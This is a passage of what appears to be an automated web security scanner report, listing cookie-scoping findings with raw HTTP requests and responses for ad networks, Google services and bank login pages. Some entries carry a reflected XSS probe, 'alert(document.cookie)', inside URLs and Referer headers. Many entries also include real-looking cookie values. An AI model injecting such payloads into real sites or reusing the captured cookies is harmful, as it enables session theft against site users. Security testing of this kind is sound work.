ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif Date: Wed, 02 Feb 2011 23:36:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Server: Apache-Coyote/1.1 Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/ Content-Length: 42
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /select/Login HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1 Host: affiliate.invisionpower.com Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC" Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com Content-Length: 0 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:19 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:18 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:13 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1 Host: jpmorganchase.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 01:02:55 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 01:02:55 GMT Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www11 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvL!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:59:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Wed, 02 Feb 2011 22:59:53 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/place HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /set_beta HTTP/1.1 Host: maps.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:03:15 GMT Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 3344
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Expires: Thu, 03 Feb 2011 01:04:34 GMT Date: Thu, 03 Feb 2011 01:04:34 GMT Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _rtok=pcSl80AzCFK1; Path=/; HttpOnly Set-Cookie: S=photos_html=3TxB0OJcIel5X3seqPZpgw; Domain=.google.com; Path=/; HttpOnly Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home?q=bluefin+tuna&hl=en&tab=nq HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Expires: Thu, 03 Feb 2011 01:04:34 GMT Date: Thu, 03 Feb 2011 01:04:34 GMT Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _rtok=XOdbNb214OeD; Path=/; Secure; HttpOnly Set-Cookie: S=photos_html=rilNzQiMmc74Pq981rH-LQ; Domain=.google.com; Path=/; Secure; HttpOnly Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Thu, 03 Feb 2011 01:26:00 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
